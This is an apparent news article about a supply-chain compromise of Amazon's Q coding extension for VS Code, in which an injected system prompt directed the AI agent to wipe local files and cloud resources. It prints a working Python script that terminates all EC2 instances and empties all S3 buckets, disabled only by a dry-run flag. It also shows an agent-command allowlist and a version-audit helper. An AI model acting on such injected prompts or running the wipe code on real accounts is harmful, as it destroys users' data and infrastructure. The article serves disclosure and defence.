In a significant security breach, a hacker infiltrated Amazon’s AI-powered coding assistant, Q, by injecting malicious code designed to erase users’ local files and cloud resources. The unauthorized code was incorporated into version 1.84.0 of the Amazon Q extension for Visual Studio Code, which was then released to the public.
The Breach and Its Mechanism
The attacker submitted a pull request to Amazon’s GitHub repository from an unprivileged account. Surprisingly, the request was approved, and the hacker was granted administrative access. On July 13, the malicious code was added, and by July 17, Amazon had released the compromised version without detecting the intrusion. The injected code contained a system prompt instructing the AI agent to restore the system to a near-factory state and to delete file-system and cloud resources. The directive included commands to terminate EC2 instances and empty S3 buckets, posing a severe risk to users’ data and cloud infrastructure.
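The payload itself has only been described in outline, but the actions it names map onto ordinary AWS API calls. The Python sketch below is purely illustrative, not the attacker’s code: it assumes boto3 with default credentials, keeps a DRY_RUN guard enabled so nothing is actually deleted, and exists only to show how little code an agent holding cloud credentials needs in order to carry out such a directive.

```python
# Illustrative only: the category of destructive AWS calls the injected
# prompt reportedly directed the agent to perform. Not the attacker's
# code. Assumes boto3 with default credentials; DRY_RUN stays True so
# nothing is actually deleted.
import boto3

DRY_RUN = True  # flip only inside a disposable sandbox account

def terminate_all_instances(ec2) -> None:
    # Enumerate every instance in the region (first page only; a full
    # sweep would paginate) and terminate the lot.
    reservations = ec2.describe_instances()["Reservations"]
    instance_ids = [i["InstanceId"]
                    for r in reservations for i in r["Instances"]]
    print(f"target instances: {instance_ids}")
    if instance_ids and not DRY_RUN:
        ec2.terminate_instances(InstanceIds=instance_ids)

def empty_all_buckets(s3) -> None:
    # Delete every object in every bucket the credentials can see.
    for bucket in s3.buckets.all():
        print(f"target bucket: {bucket.name}")
        if not DRY_RUN:
            bucket.objects.all().delete()

if __name__ == "__main__":
    terminate_all_instances(boto3.client("ec2"))
    empty_all_buckets(boto3.resource("s3"))
```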
Amazon’s Response and Mitigation Efforts
Upon discovering the breach, Amazon promptly removed version 1.84.0 from the Visual Studio Marketplace and released a patched version, 1.85.0, without issuing a public advisory. The company stated, “Security is our top priority. We quickly mitigated an attempt to exploit a known issue in two open-source repositories… and confirmed that no customer resources were impacted.” Amazon also revoked the attacker’s credentials to prevent further unauthorized access.
Implications for AI Development Tools
This incident underscores the growing vulnerabilities associated with integrating AI tools into development environments. As AI agents are granted permissions to execute shell commands and access cloud credentials, they become attractive targets for adversaries. Security experts warn that prompt-based tampering could become a favored method for attackers seeking to exploit such tools.
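One concrete mitigation is to interpose a narrow gate between the model and the shell. The sketch below is a minimal illustration under stated assumptions, not any vendor’s implementation: the function name and allowlist are hypothetical, and the idea is simply that model-proposed commands are parsed and checked against an explicit allowlist before anything executes.

```python
# Minimal sketch of a privilege gate between an AI agent and the shell.
# The names here (run_agent_command, ALLOWED) are hypothetical; real
# agent harnesses differ. The point: never pass model output to a shell
# unfiltered, and never run the agent with cloud-admin credentials.
import shlex
import subprocess

# Explicit allowlist of binaries the agent may invoke.
ALLOWED = {"ls", "cat", "grep", "git", "python3"}

def run_agent_command(command: str) -> str:
    """Execute a model-proposed command only if its binary is allowlisted."""
    argv = shlex.split(command)
    if not argv or argv[0] not in ALLOWED:
        raise PermissionError(f"blocked: {command!r}")
    # Passing an argv list keeps shell=False, so pipes, '&&', and
    # redirections in model output become literal arguments rather
    # than ways to escape the allowlist.
    result = subprocess.run(argv, capture_output=True, text=True, timeout=30)
    return result.stdout
```

Under this scheme, a proposal such as `aws s3 rm --recursive s3://bucket` raises PermissionError because `aws` is not allowlisted, while `git status` runs normally.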
Recommendations for Users
Users of Amazon Q are advised to update to the latest version immediately, audit their extension histories, and restrict agent privileges to mitigate potential risks. The next injected prompt may not be defective by design; proactive measures are essential.
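As a starting point for that audit, the installed extension version can be read from the VS Code CLI. The sketch below is a hypothetical helper: the extension identifier is an assumption to verify against the Marketplace listing, and only the `code --list-extensions --show-versions` invocation itself is standard VS Code tooling.

```python
# Sketch of an extension-version audit via the VS Code CLI. The
# extension ID below is an assumption; verify it against the
# Marketplace listing before relying on it.
import subprocess

SUSPECT_ID = "amazonwebservices.amazon-q-vscode"  # assumed identifier
PATCHED = (1, 85, 0)  # first clean release per Amazon

def installed_extensions() -> dict[str, str]:
    # `code --list-extensions --show-versions` prints one line per
    # extension in the form publisher.name@x.y.z.
    out = subprocess.run(
        ["code", "--list-extensions", "--show-versions"],
        capture_output=True, text=True, check=True,
    ).stdout
    return dict(line.rsplit("@", 1) for line in out.splitlines() if "@" in line)

version = installed_extensions().get(SUSPECT_ID)
if version and tuple(map(int, version.split("."))) < PATCHED:
    print(f"{SUSPECT_ID} {version} predates the patched 1.85.0 -- update now")
```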